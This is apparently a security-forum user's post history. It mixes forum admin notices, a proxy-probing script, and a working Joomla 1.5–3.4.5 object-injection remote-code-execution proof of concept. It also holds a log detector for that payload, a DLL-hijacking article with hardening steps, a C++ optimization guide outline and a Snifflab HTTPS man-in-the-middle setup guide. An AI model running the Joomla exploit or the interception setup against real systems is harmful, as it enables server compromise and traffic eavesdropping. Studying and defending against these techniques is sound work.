Everything posted by Nytro (Posts: 18737, Days Won: 711)
I'll look at the login part. Use the login on the forum; the one on the homepage is improvised and doesn't send all the variables.
-
There is no setting for that; I'll ask the developers.
-
It's on the list. If someone writes me a regular expression for .htaccess, it will happen all the sooner.
-
No, all the posts from January until now were lost. They won't be recovered.
-
I'll add syntax highlighting too; it's on the list.
-
If you want to run tests, use this category.
-
Yes, interesting; who knows where it leaked, we'll see. Thanks. We want to launch it this week. If you have ideas, let me know.
-
Test.
-
Hi, We have decided to replace the old vBulletin 4 with a much more modern and useful platform: IPBoard. I should mention that problems may appear, but we will fix them. Whatever problem you run into, post it here or send me a PM. The upgrade started in January, so everything posted in January has disappeared. There are also several changes you should keep in mind:
1. Illegal things are no longer allowed: roots, VPSes, SMTPs etc.
2. A few categories are gone: Club ShowOff, Games Hacks etc. I tidied up a bit.
3. There is a Downloads system, but uploading copyrighted files is not allowed.
4. Accessing this website requires accepting the terms and conditions. It would be good to read that text; it is not long.
5. Free stuff will be limited; not every stolen account will be posted anymore.
6. In RST Market every posted topic will be moderated. We don't know yet what to do with it.
7. There is no VIP anymore. Whoever is useful from now on will receive VIP.
8. I can't offer a complete list of changes; I will update it over time.
The purpose of this forum is to help the Romanian community in the fields of IT security, programming and many others. With this change we want to get rid of those who come here for junk: scanners, roots and other nonsense that can get them into trouble. If you came here for that, this is not the right place. We will ban you for anything close to these practices. You are not useful to the community and the community is not useful to you. We have invested both money and time in this forum (the staff + others). I don't want to speak on their behalf; I want to continue this project because many years ago I only knew Counter-Strike, but the time spent in this community, with the people of those days, helped me, and now I work in IT security.
The purpose of this forum is to educate newcomers and not lead them down the wrong path, but everyone is responsible for their own actions. That does not mean the forum will be completely whitehat :). Blackhat techniques, exploits and other interesting things are presented by big names in the field at international conferences, so we will not shy away from publishing them here. Try to do something yourselves too; you'll see it helps you a lot later on. Try to help others and you'll see that you'll be helped as well. More, in time. // RST Staff
- 143 replies
Hi, This category is dedicated to beginners. If you are a beginner and have a question you can't find the answer to, need help with a simple problem or just want some advice, this is the right category. Avoid questions like "How do I hack a site" and so on. We will create an FAQ page (frequently asked questions) where we will answer those questions.
-
R.I.P Ian Murdock, Founder of Debian Linux, Dead at 42
Nytro replied to TheOne's topic in Stiri securitate
https://web.archive.org/web/20151229122811/https:/twitter.com/imurdock
It's still valid.
-
You scan a few common proxy ports and test them: you try to send a request through them. You can also check whether they require authentication. It would catch a lot of "public" proxies (aka honeypots) but it would be extremely slow.
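As an added example (not part of the post above and not Nytro's code), here is the probe the reply describes in Python: connect to each candidate port, send a proxy-style request with an absolute URL, and classify the reply, treating 407 as "requires authentication". The port list, the target URL and the four sample replies are constructed for the example; probe_proxy() does real network I/O, while classify_response() and build_probe() can be exercised offline.

```python
import re
import socket

# Ports commonly used by HTTP proxies; a constructed starting list, extend as needed.
COMMON_PROXY_PORTS = (80, 3128, 8080, 8000, 8888)

# Constructed sample replies, not captured from any real host.
SAMPLE_OPEN = b"HTTP/1.1 200 OK\r\nVia: 1.1 squid\r\nContent-Length: 0\r\n\r\n"
SAMPLE_AUTH = b'HTTP/1.1 407 Proxy Authentication Required\r\nProxy-Authenticate: Basic realm="proxy"\r\n\r\n'
SAMPLE_WEB = b"HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n"
SAMPLE_JUNK = b"SSH-2.0-OpenSSH_7.1\r\n"


def build_probe(target="http://example.com/"):
    """Proxy-style request: absolute URL in the request line plus a Host header.
    A proxy forwards it; a plain web server typically answers 400 or serves itself."""
    host = target.split("//", 1)[1].split("/", 1)[0]
    return ("GET {0} HTTP/1.1\r\nHost: {1}\r\nConnection: close\r\n\r\n"
            .format(target, host)).encode()


def classify_response(raw):
    """Map a raw reply to a verdict: open, auth-required, refused or no-http.
    A 2xx alone is weak evidence (HTTP/1.1 servers must accept absolute URLs),
    so the presence of a Via header is reported separately as corroboration."""
    m = re.match(rb"HTTP/\d\.\d (\d{3})", raw)
    if not m:
        return {"verdict": "no-http", "status": None, "via": False}
    status = int(m.group(1))
    head = raw.split(b"\r\n\r\n", 1)[0].lower()
    via = b"\r\nvia:" in head
    if status == 407:
        verdict = "auth-required"
    elif 200 <= status < 400:
        verdict = "open"
    else:
        verdict = "refused"
    return {"verdict": verdict, "status": status, "via": via}


def probe_proxy(host, port, timeout=3.0):
    """Connect, send the probe, read until the peer closes, then classify.
    This is the slow part the reply warns about: run it from a thread pool
    and keep the timeout short."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_probe())
            chunks, total = [], 0
            while total < 65536:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
                total += len(data)
    except OSError as exc:
        return {"host": host, "port": port, "verdict": "unreachable", "error": str(exc)}
    result = classify_response(b"".join(chunks))
    result.update(host=host, port=port)
    return result


def scan_host(host, ports=COMMON_PROXY_PORTS):
    """Probe every common proxy port on one host."""
    return [probe_proxy(host, p) for p in ports]


if __name__ == "__main__":
    import sys
    for r in scan_host(sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"):
        print(r)
```

To confirm an "open" verdict, fetch a URL whose body you can recognize through the candidate, or require the Via header; a bare 200 from an absolute-URL request can come from an ordinary web server.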
-
http://exfiltrated.com/research-Instagram-RCE.php
-
DEF CON 23 - Ionut Popescu - NetRipper: Smart Traffic Sniffing for Penetration Testers
Published on 16 Dec. 2015

The post-exploitation activities in a penetration test can be challenging if the tester has low privileges on a fully patched, well-configured Windows machine. This work presents a technique for helping the tester find useful information by sniffing the network traffic of the applications on the compromised machine, despite his low-privileged rights. Furthermore, encrypted traffic is captured before it is handed to the encryption layer, so all traffic (clear-text and encrypted) can be sniffed. The implementation of this technique is a tool called NetRipper, which uses API hooking to do the above. It was designed for penetration tests, but the concept can also be used to monitor the network traffic of employees or to analyze a malicious application.

Speaker Bio
Ionut works as a Senior Security Consultant at KPMG in Romania. He is passionate about ASM, reverse engineering, shellcode and exploit development, and he holds an MCTS Windows Internals certification. He has spoken at various security conferences in Romania (Defcamp, OWASP local meetings and others) and at the yearly Hacknet KPMG international conference in Helsinki and Berlin. Ionut is also the main administrator of the biggest Romanian IT security community, rstforums.com, and writes technical articles on a blog started by a passionate team: securitycafe.ro. Twitter: @NytroRST
-
Joomla 1.5 - 3.4.5 - Object Injection Remote Command Execution

```python
'''
Simple PoC for Joomla Object Injection.
Gary @ Sec-1 ltd
http://www.sec-1.com/
'''
import requests  # pip install requests


def get_url(url, user_agent):
    # The serialized payload travels in the User-Agent header, which Joomla
    # stores in its session table. The follow-up requests carry the session
    # cookie, so Joomla reads the stored session back and unserializes it.
    headers = {
        'User-Agent': user_agent
    }
    cookies = requests.get(url, headers=headers).cookies
    for _ in range(3):
        response = requests.get(url, headers=headers, cookies=cookies)
    return response


def php_str_noquotes(data):
    "Convert string to chr(xx).chr(xx) for use in php"
    encoded = ""
    for char in data:
        encoded += "chr({0}).".format(ord(char))
    return encoded[:-1]


def generate_payload(php_payload):
    php_payload = "eval({0})".format(php_str_noquotes(php_payload))
    # Four-byte UTF-8 sequence: MySQL truncates the stored session data here,
    # so everything after the payload is discarded.
    terminate = '\xf0\xfd\xfd\xfd'
    # Raw strings keep the literal \0\0\0; Joomla's database session storage
    # turns it back into the null bytes of a protected property name on read.
    exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
    injected_payload = "{};JFactory::getConfig();exit".format(php_payload)
    exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
    exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate
    return exploit_template


pl = generate_payload("system('touch /tmp/fx');")
print(get_url("http://172.31.6.242/", pl))
```

Source: https://www.exploit-db.com/exploits/38977/
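As an added example that is neither part of the exploit nor of the original post: the server-side view of the same payload. The script reads Apache combined-format access log lines (constructed here, with Apache's \" and \xHH escaping), pulls the User-Agent, and flags PHP serialized-object headers whose length field matches the class name, the gadget classes this PoC chains, the assert sink in cache_name_function, and the four-byte truncation marker. The client addresses and log contents are made up.

```python
import re

# Constructed Apache combined-format access log lines for this example; not real traffic.
# Apache escapes a double quote inside a header value as \" and non-printable bytes as \xHH.
SAMPLE_LOG = [
    r'203.0.113.5 - - [14/Dec/2015:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/42.0"',
    r'203.0.113.9 - - [14/Dec/2015:10:00:07 +0000] "GET / HTTP/1.1" 200 512 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"feed_url\";s:39:\"eval(chr(1));JFactory::getConfig();exit\";s:19:\"cache_name_function\";s:6:\"assert\";}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\xfd\xfd\xfd"',
]

SERIALIZED_OBJECT = re.compile(r'O:(\d+):"([^"]+)"')   # PHP object header O:<len>:"<class>"
CALLBACK_SINK = re.compile(r's:19:"cache_name_function";s:\d+:"(assert|system|eval|passthru)"')
GADGET_CLASSES = {"JDatabaseDriverMysqli", "JDatabaseDriverMysql", "JSimplepieFactory", "SimplePie"}
TRUNCATION_MARKER = r"\xf0\xfd\xfd\xfd"                # the 4-byte sequence as Apache writes it


def extract_user_agent(line):
    """User-Agent is the last quoted field of the combined format; undo the \\" escaping."""
    head, _, tail = line.rpartition('" "')
    if not head:
        return None
    return tail.rstrip('"').replace('\\"', '"')


def inspect_user_agent(ua):
    """Return a list of findings for one User-Agent value."""
    findings = []
    for length, cls in SERIALIZED_OBJECT.findall(ua):
        if int(length) != len(cls):
            continue  # length field does not match: not a well-formed object header
        findings.append(("gadget:" if cls in GADGET_CLASSES else "object:") + cls)
    sink = CALLBACK_SINK.search(ua)
    if sink:
        findings.append("sink:" + sink.group(1))
    if TRUNCATION_MARKER in ua:
        findings.append("truncation-marker")
    return findings


def verdict(findings):
    """block = known gadget chain plus a callback sink; any other object header is suspicious."""
    has_gadget = any(f.startswith("gadget:") for f in findings)
    has_sink = any(f.startswith("sink:") for f in findings)
    if has_gadget and has_sink:
        return "block"
    return "suspicious" if findings else "clean"


def scan_log(lines):
    results = []
    for line in lines:
        ua = extract_user_agent(line)
        findings = inspect_user_agent(ua) if ua else []
        results.append({"client": line.split(" ", 1)[0],
                        "findings": findings,
                        "verdict": verdict(findings)})
    return results


if __name__ == "__main__":
    for r in scan_log(SAMPLE_LOG):
        print(r["client"], r["verdict"], r["findings"])
```

The same checks apply to any header Joomla stores in the session (X-Forwarded-For was also abused in the wild), so run the inspector over those fields too rather than over User-Agent alone.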
-
Retargetable Decompiler

Our main goal is to create a retargetable decompiler that can be used for source code recovery, static malware analysis, etc. The decompiler is not bound to any particular target architecture, operating system, or executable file format.

Features
- Handles all the commonly used file formats (ELF, PE, COFF).
- Currently supports the Intel x86, ARM, MIPS, PIC32, and PowerPC architectures.
- Can decompile to two high-level output languages: C and a Python-like language.
- Compiler and packer detection.
- Extraction and utilization of debugging information (DWARF, PDB).
- Signature-based removal of statically linked library code.
- Reconstruction of functions, high-level constructs, types, etc.
- Generation of call graphs, control-flow graphs, and various statistics.

It is actively developed. You can try all of these features using our online decompilation service.
Source: https://retdec.com/
-
Crash Course In DLL Hijacking
by Tien Phan | December 10, 2015

Overview
This week we heard a lot about a DLL hijacking vulnerability from the security community. It began with a 0-day DLL hijacking in Microsoft Office discovered by an independent security researcher named Parvez Anwar. Shortly after, the website securify.nl published an article detailing this kind of attack and discussing the vast potential attack surface associated with DLLs and OLE.

A dynamic link library (DLL) is a basic component of the Windows operating system. DLLs are loaded into a Windows application when it starts, or later when they are needed, and provide the application with resources such as Application Programming Interfaces (APIs) and additional procedures. If an attacker can control which DLL a program loads, the attacker can insert a malicious DLL into the loading process. This method is not new; quite a few articles on the technique are available on the Internet, especially from Microsoft. In a nutshell, the vulnerability in this latest Microsoft 0-day lay in the way Microsoft Office searches for DLL components that are not present on the system, which allows DLL hijacking. But, as detailed below, that kind of vulnerability is not exclusive to Microsoft Office.

Attack Details
The DLL search order is well documented by Microsoft. To recap, depending on the system configuration, a program's request for a DLL by name walks a fixed list of directories. By default (SafeDllSearchMode disabled) the order is:
1. The directory from which the application is loaded
2. The current directory
3. The system directory, usually C:\Windows\System32\ (the GetSystemDirectory function returns this directory)
4. The 16-bit system directory (there is no dedicated function to retrieve this path, but it is searched as well)
5. The Windows directory (the GetWindowsDirectory function returns this directory)
6. The directories listed in the PATH environment variable

Here the current directory is the problem. When a program loads a DLL by name and the search reaches the current directory, whoever controls that directory controls the DLL. For example, when the user opens a Microsoft Word document, Microsoft Office will try to load a missing DLL component from the location of that document. An attacker can place a malicious DLL next to the document and, as a result, Microsoft Office inadvertently loads the malicious code. Another practical scenario is sharing a Word document over a Windows file share together with the malicious DLL.

If SafeDllSearchMode is enabled, the technique is harder to use. In that case the search order is:
1. The directory from which the application is loaded
2. The system directory (GetSystemDirectory)
3. The 16-bit system directory
4. The Windows directory (GetWindowsDirectory)
5. The current directory
6. The directories listed in the PATH environment variable

Note that this does not include the per-application path specified by the App Paths registry key; that key is not used when computing the DLL search path. The current directory is still in the list. The difference is that the system directories are searched first and the current directory only if the DLL is not found there, so a DLL that does not exist anywhere on the system is still picked up from the current directory.

How do I protect myself from DLL hijacking?
For end users, the best way to prevent this attack is to apply the latest patch from the vendor. You can also harden your system with the following steps:
1. Open Notepad.
2. Copy and paste the following text:

```reg
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager]
"SafeDllSearchMode"=dword:00000001
"CWDIllegalInDllSearch"=dword:ffffffff
```

3. Save it as "patch.reg".
4. Double-click patch.reg and click Yes on the Windows prompt.

This enables SafeDllSearchMode and disables loading DLLs from the current directory: the value 0xffffffff for CWDIllegalInDllSearch blocks current-directory DLL loads for every process on the machine, so test applications that legitimately load DLLs from their working directory after applying it.

For developers, follow the guidance from Microsoft. We also developed a small tool for learning and demonstration purposes. It tracks new process creation and hooks each new process to force a call to the SetDllDirectory API with an empty string argument, which removes the current directory from that process's DLL search path. The source code of the tool is available here.

-= FortiGuard Lion Team =-
Source: http://blog.fortinet.com/post/a-crash-course-in-dll-hijacking
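As an added example (not code from the Fortinet post or its tool), the Python below models the two documented search orders and the CWDIllegalInDllSearch setting, and resolves a DLL request against a constructed directory layout. It shows the point the article makes: with SafeDllSearchMode on, a DLL that exists in System32 is no longer hijackable from the document's directory, but a DLL that exists nowhere on the system still is, until current-directory loads are blocked outright. The paths, DLL names (version.dll, a hypothetical helper.dll) and the attacker share are assumptions for the example; KnownDLLs, manifests and SetDllDirectory are not modelled.

```python
# Constructed directory layout; nothing is read from a real system.
APP_DIR = r"C:\Program Files\App"
SYSTEM_DIR = r"C:\Windows\System32"
SYSTEM16_DIR = r"C:\Windows\System"
WINDOWS_DIR = r"C:\Windows"
PATH_DIRS = [r"C:\Tools"]
SHARE = r"\\attacker\docs"          # directory the opened document lives in (hypothetical)

# Files present in each directory: one real system DLL, plus an attacker-planted copy of it
# and a hypothetical helper.dll that exists nowhere else, both sitting next to the document.
FILESYSTEM = {
    SYSTEM_DIR: {"version.dll"},
    SHARE: {"version.dll", "helper.dll"},
}


def search_order(cwd, safe_dll_search_mode=True, cwd_illegal=False):
    """Directories consulted, in order, for a DLL requested by bare name.
    Mirrors the two documented orders; cwd_illegal models CWDIllegalInDllSearch=0xffffffff,
    which removes the current directory from the search entirely."""
    if safe_dll_search_mode:
        order = [APP_DIR, SYSTEM_DIR, SYSTEM16_DIR, WINDOWS_DIR, cwd] + PATH_DIRS
    else:
        order = [APP_DIR, cwd, SYSTEM_DIR, SYSTEM16_DIR, WINDOWS_DIR] + PATH_DIRS
    if cwd_illegal:
        order = [d for d in order if d != cwd]
    return order


def resolve(dll, filesystem, cwd, **mode):
    """Full path the loader would pick under the given mode, or None if the load fails."""
    for directory in search_order(cwd, **mode):
        present = {name.lower() for name in filesystem.get(directory, ())}
        if dll.lower() in present:
            return directory + "\\" + dll
    return None


def hijack_report(dll, cwd=SHARE):
    """Where `dll` is loaded from under each configuration when the current directory is the share."""
    return {
        "safe_off": resolve(dll, FILESYSTEM, cwd, safe_dll_search_mode=False),
        "safe_on": resolve(dll, FILESYSTEM, cwd, safe_dll_search_mode=True),
        "cwd_blocked": resolve(dll, FILESYSTEM, cwd, safe_dll_search_mode=True, cwd_illegal=True),
    }


if __name__ == "__main__":
    for name in ("version.dll", "helper.dll"):
        print(name, hijack_report(name))
```

A load that returns None is the safe outcome for the hypothetical helper.dll: the application fails to find it instead of executing whatever sits next to the document.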
-
Optimizing software in C++: An optimization guide for Windows, Linux and Mac platforms
By Agner Fog. Technical University of Denmark. Copyright © 2004 - 2014. Last updated 2014-08-07.

Contents
1 Introduction
1.1 The costs of optimizing
2 Choosing the optimal platform
2.1 Choice of hardware platform
2.2 Choice of microprocessor
2.3 Choice of operating system
2.4 Choice of programming language
2.5 Choice of compiler
2.6 Choice of function libraries
2.7 Choice of user interface framework
2.8 Overcoming the drawbacks of the C++ language
3 Finding the biggest time consumers
3.1 How much is a clock cycle?
3.2 Use a profiler to find hot spots
3.3 Program installation
3.4 Automatic updates
3.5 Program loading
3.6 Dynamic linking and position-independent code
3.7 File access
3.8 System database
3.9 Other databases
3.10 Graphics
3.11 Other system resources
3.12 Network access
3.13 Memory access
3.14 Context switches
3.15 Dependency chains
3.16 Execution unit throughput
4 Performance and usability
5 Choosing the optimal algorithm
6 Development process
7 The efficiency of different C++ constructs
7.1 Different kinds of variable storage
7.2 Integer variables and operators
7.3 Floating point variables and operators
7.4 Enums
7.5 Booleans
7.6 Pointers and references
7.7 Function pointers
7.8 Member pointers
7.9 Smart pointers
7.10 Arrays
7.11 Type conversions
7.12 Branches and switch statements
7.13 Loops
7.14 Functions
7.15 Function parameters
7.16 Function return types
7.17 Structures and classes
7.18 Class data members (properties)
7.19 Class member functions (methods)
7.20 Virtual member functions
7.21 Runtime type identification (RTTI)
7.22 Inheritance
7.23 Constructors and destructors
7.24 Unions
7.25 Bitfields
7.26 Overloaded functions
7.27 Overloaded operators
7.28 Templates
7.29 Threads
7.30 Exceptions and error handling
7.31 Other cases of stack unwinding
7.32 Preprocessing directives
7.33 Namespaces
8 Optimizations in the compiler
8.1 How compilers optimize
8.2 Comparison of different compilers
8.3 Obstacles to optimization by compiler
8.4 Obstacles to optimization by CPU
8.5 Compiler optimization options
8.6 Optimization directives
8.7 Checking what the compiler does
9 Optimizing memory access
9.1 Caching of code and data
9.2 Cache organization
9.3 Functions that are used together should be stored together
9.4 Variables that are used together should be stored together
9.5 Alignment of data
9.6 Dynamic memory allocation
9.7 Container classes
9.8 Strings
9.9 Access data sequentially
9.10 Cache contentions in large data structures
9.11 Explicit cache control
10 Multithreading
10.1 Hyperthreading
11 Out of order execution
12 Using vector operations
12.1 AVX instruction set and YMM registers
12.2 AVX-512 instruction set and ZMM registers
12.3 Automatic vectorization
12.4 Using intrinsic functions
12.5 Using vector classes
12.6 Transforming serial code for vectorization
12.7 Mathematical functions for vectors
12.8 Aligning dynamically allocated memory
12.9 Aligning RGB video or 3-dimensional vectors
12.10 Conclusion
13 Making critical code in multiple versions for different instruction sets
13.1 CPU dispatch strategies
13.2 Model-specific dispatching
13.3 Difficult cases
13.4 Test and maintenance
13.5 Implementation
13.6 CPU dispatching in Gnu compiler
13.7 CPU dispatching in Intel compiler
14 Specific optimization topics
14.1 Use lookup tables
14.2 Bounds checking
14.3 Use bitwise operators for checking multiple values at once
14.4 Integer multiplication
14.5 Integer division
14.6 Floating point division
14.7 Don't mix float and double
14.8 Conversions between floating point numbers and integers
14.9 Using integer operations for manipulating floating point variables
14.10 Mathematical functions
14.11 Static versus dynamic libraries
14.12 Position-independent code
14.13 System programming
15 Metaprogramming
16 Testing speed
16.1 Using performance monitor counters
16.2 The pitfalls of unit-testing
16.3 Worst-case testing
17 Optimization in embedded systems
18 Overview of compiler options
19 Literature
20 Copyright notice

Download: http://www.agner.org/optimize/optimizing_cpp.pdf
-
How To Perform "MITM Attack On HTTPS" Traffic Using Snifflab Posted by Kali Linux Researchers developed a technical test environment for capturing and decrypting WiFi data transmissions. The code for it lives on Github. Researchers created a WiFi hotspot that is continually collecting all the packets sent over it. All connected clients’ even HTTPS communications are subjected to a “Man-in-the-middle” attack, whereby they can later be decrypted for analysis. This article presents a detailed look at how this test environment works and then gets into how to set one up for your own testing purposes, including a list of required parts. Setting one up yourself is not user-friendly, and requires familiarity with the unix command line and networking concepts. Motivation Researchers and end-users alike often seek to understand what data their mobile device is sending to third parties. Unfortunately, monitoring one’s phone to see what, and to whom, data is sent is not exactly simple. Using packet capture software on Android is impossible without first rooting the device, and even then, difficult to use and export saved data. There are no applications to capture packets on iOS. Also See:How To Sniff The Browser History Using Sniffly Our motivation for creating the test environment described herein is to make it incredibly easy to capture packets for any device with a WiFi connection, with very little client configuration needed. How it works In our environment, dubbed Snifflab, a researcher simply connects to the Snifflab WiFi network, is prompted to install a custom certificate authority on the device, and then can use their device as needed for the test. Snifflab architecture All traffic on the network is logged by a Raspberry Pi dedicated to that task (“PCAP Collecting Machine”, in the Figure). The traffic is cloned by a Great Scott Gadgets Throwing Star LAN Tap, which routes it both to its destination, and to our Raspberry Pi. 
The Pi continually collects packet data, creating new packet capture (pcap) files at a regular interval, or once the active file reaches a configurable size. Saved files are regularly transferred to another machine (“Backup Machine”) for persistent storage. Users with SSH access to the Pi can also manually restart the pcap service, to get instant access to the captured packets, instead of waiting for the interval. The custom certificate that each client must install enables the proxy server (“MITM Proxy Machine”) through which Snifflab routes its traffic to intercept HTTPS requests to the outside world, and re-encrypt them using certificates generated on-the-fly. This allows for the researcher to later decrypt most captured network traffic sent over HTTPS. On the backup machine, the researcher has access to all previously-collected PCAPs, organized into folders by date, with each file named by the unix time at which the capture began. Also See:Network Scanning Using Nmap 7 From Basic To Advance The researcher may then open up the collected PCAP(s) in Wireshark or their utility of choice to analyze and decrypt the traffic. On packet captures A Packet capture (pcap) is a widely used data format for storing low-level network data transmission information. The packet is the base unit of data transmission on networks. To send a message from one computer to another, networking software breaks up the message into small packet files, each with metadata that — among other things — describes the source of the data, the destination, and the specific packet’s ID so that packets can be reassembled correctly at the destination. A pcap file is a collection of packets sent over a network. pcaps are created using software that “listens” to one or more network interfaces running on a given device, and dumps all the data packets it detects into a pcap file for future analysis. For example, one could listen on a computer’s WiFi interface, or the ethernet interface, or both. 
How-to

This section describes the hardware, software, and configuration we used to set up Snifflab. It should be sufficient information to guide the creation of a new Snifflab instance from scratch.

[Figure: Snifflab router, PCAP machine, and LAN Tap]

Parts needed

- 1 router (in addition to your primary one), capable of running DD-WRT standard firmware
- 1 Raspberry Pi 2 Model B+
- 1 server running all the time (Ubuntu) for backups and running the MITM proxy
- 1 Great Scott Gadgets Throwing Star LAN Tap
- 1 USB LAN adapter (TRENDnet TU3-ETG)
- 1 USB WiFi adapter (TP-Link TL-WN725N)
- Many Ethernet cables

The testing network

We used a Cisco WRT54GL router to administer the Snifflab access point. We installed the DD-WRT Standard build firmware on this router. Please consult the DD-WRT guide to ensure your router is supported, lest you risk bricking your device.

We connected this router's internet port to our pre-existing LAN, creating a subnet with its own IP space. However, we don't directly connect the router to the LAN. Between the LAN ethernet and the Snifflab router, we place a Great Scott Gadgets Throwing Star LAN Tap. This device allows us to passively sniff all traffic passing through it. In this manner, a copy of all network traffic is directed to our PCAP collecting machine.

The LAN tap, unfortunately, has two separate ethernet ports for sniffing traffic. One is for inbound traffic, and the other, outbound. As such, the PCAP collecting machine needs to have two ethernet interfaces on which to listen for packets. This is discussed further below.

Transparently proxying traffic to get MITM'd

The router's iptables must also be configured to transparently forward packets to the MITM proxy device. To do that, we log in as administrator to the DD-WRT network portal, and navigate to Administration > Commands.
There, we enter the following commands, replacing the value of the PROXYIP variable with the IP address of your MITM proxy machine:

    PROXYIP=192.168.0.2
    iptables -t mangle -A PREROUTING -j ACCEPT -p tcp -m multiport --dports 80,443 -s $PROXYIP
    iptables -t mangle -A PREROUTING -j MARK --set-mark 3 -p tcp -m multiport --dports 80,443
    ip rule add fwmark 3 table 2
    ip route add default via $PROXYIP dev vlan1 table 2

The last line in the above code refers to the vlan1 network interface. Make sure the network interface your router uses to communicate with the WAN is in fact vlan1 for your router, and adjust if needed. For example, this guide to setting up transparent proxies mentions br0 instead.

Make it easy to get MITM'd

The other thing we'd like our Snifflab router to do is to act as a convenient delivery service for our mitmproxy CA certificate. The method we chose is to make Snifflab a captive WiFi portal, meaning that users must visit a sign-in splash page before being able to use the network. We create a custom splash page for the user to sign into, and a redirect page from where the certificate can be downloaded after sign-in.

[Figure: A captive WiFi portal screen makes it simple to install the MITM certificate on a client device.]

To configure a captive WiFi portal, we log in to the DD-WRT admin interface on Snifflab's default gateway, and navigate to Services > Hotspot. We then enable NoCatSplash. Set up the NoCatSplash parameters to point the home page and splash URLs to a web server (hopefully running on your WAN) that serves redirect.html and splash.html as contained in the Git repository described below. Ensure that Homepage Redirection is turned on. Set a login timeout.

The PCAP collecting machine

In our system, a Raspberry Pi 2 Model B+ functions as the PCAP collecting machine.
Setting up this Pi for sniffing network traffic sent to it from the LAN tap, and then backing up those captured packets to another machine, requires the configuration of multiple network interfaces.

Since the LAN tap splits inbound traffic to one ethernet port, and outbound to another, we need two ethernet interfaces on the Pi to capture both directions. However, packet capturing is much more straightforward if done on a single network interface. As such, we'll have to bond the two ethernet connections into one network interface. To do that, install ifenslave and set up the network interfaces as follows:

    sudo apt-get install ifenslave-2.6

/etc/network/interfaces:

    auto lo
    iface lo inet loopback

    iface eth0 inet manual
    iface eth1 inet manual

    allow-hotplug wlan0
    iface wlan0 inet dhcp
        wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf
    iface default inet dhcp

    auto bond0
    iface bond0 inet dhcp
        bond-mode 3
        bond-miimon 100
        slaves eth0 eth1

Make sure bond-mode is set to 3, a "broadcast" policy, meaning all packets from all interfaces are transmitted via the bonding interface, otherwise packets may get dropped.

WiFi

Setting up the WiFi driver for the TP-Link TL-WN725N:

    mkdir driver
    cd driver
    wget https://dl.dropboxusercontent.com/u/80256631/8188eu-v7-20150713.tar.gz
    tar xvzf 8188eu-v7-20150713.tar.gz
    sudo ./install.sh
    cd ../
    rm -rf driver
    sudo reboot

/etc/wpa_supplicant/wpa_supplicant.conf:

    ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev
    update_config=1

    network={
        ssid=""
        psk=hashofyourpassword
        proto=RSN
        key_mgmt=WPA-PSK
        pairwise=TKIP
        auth_alg=OPEN
    }

Customize this file to suit your particular WiFi connection. It may be easier to generate a config file through the Raspberry Pi GUI. It's also best practice not to store the plaintext version of your WiFi password in this file. Instead, run wpa_passphrase to generate a hash of the password.
A WiFi connection is necessary since the two ethernet ports only receive traffic cloned from the LAN tap, and don't actually connect to the network. Thus, another network interface is needed so that one can SSH into the machine and transmit pcap files to the backup machine.

Getting the network running correctly on boot

By default, on Raspberry Pis, if ethernet is plugged in then WiFi will be automatically disabled. First, turn off ethernet hotplugging, which causes WiFi to get disabled.

/etc/default/ifplugd:

    INTERFACES="eth0"
    HOTPLUG_INTERFACES="eth0"
    ARGS="-q -f -u0 -d10 -w -I"
    SUSPEND_ACTION="stop"

Next, the script below runs at startup to ensure that multiple network interfaces can operate simultaneously. We run the ifup command on each network interface to force start all of them. We also set the two ethernet interfaces to promiscuous mode to ensure they process all packets being routed to them, for complete sniffing.

/etc/init.d/network.sh:

    #!/bin/sh
    ### BEGIN INIT INFO
    # Provides:          network.sh
    # Short-Description: Ensure WiFi as well as Ethernet interfaces are up
    # Description:
    # Default-Start:     2 3 4 5
    # Default-Stop:      0 1 6
    # Required-Start:    $remote_fs $syslog
    # Required-Stop:     $remote_fs $syslog
    ### END INIT INFO

    sudo ifplugd eth0 --kill
    sudo ifup wlan0
    sudo ifup eth0
    sudo ifup eth1
    sudo ifconfig eth1 promisc
    sudo ifconfig eth0 promisc

    exit 0

Dependencies for collecting packets

Ensure you set up your ~/.ssh/config to connect to your analysis machine without the need for a password, otherwise the backup script will fail.
    ssh-keygen -t rsa
    cat ~/.ssh/id_rsa.pub | ssh user@server 'cat >> .ssh/authorized_keys'

Installing libpcap:

    sudo apt-get install libpcap0.8 libpcap0.8-dev libpcap-dev

Installing pip:

    sudo apt-get install python3-pip
    sudo apt-get install python-pip

Installing pcapy:

    wget https://pypi.python.org/packages/source/p/pcapy/pcapy-0.10.8.tar.gz
    tar xvzf pcapy-0.10.8.tar.gz
    cd pcapy-0.10.8/
    python setup.py install

Installing dpkt:

    pip install dpkt
    pip install dpkt --upgrade

Make sure the timezone is set correctly:

    tzconfig
    sudo dpkg-reconfigure tzdata

Capturing Packets

Get the latest code from Github. This guide refers to a copy of the repo housed at /home/pi/snifflab. This repository contains sniffer.py, a Python application developed to capture packets on an interface into PCAPs, creating new ones at a fixed interval, or when a file size limit is reached. The interface, interval, and filesize limit are all configurable command line parameters:

- -i (specify the network interface)
- -s (specify the file size limit)
- -t (specify the time interval, in seconds, between new PCAP files)
- -f (specify a filename suffix to append to each PCAP)
- -u (specify an ssh username for a remote backup)
- -h (specify an ssh host for remote backup)
- -p (specify the path on the remote host for backup)

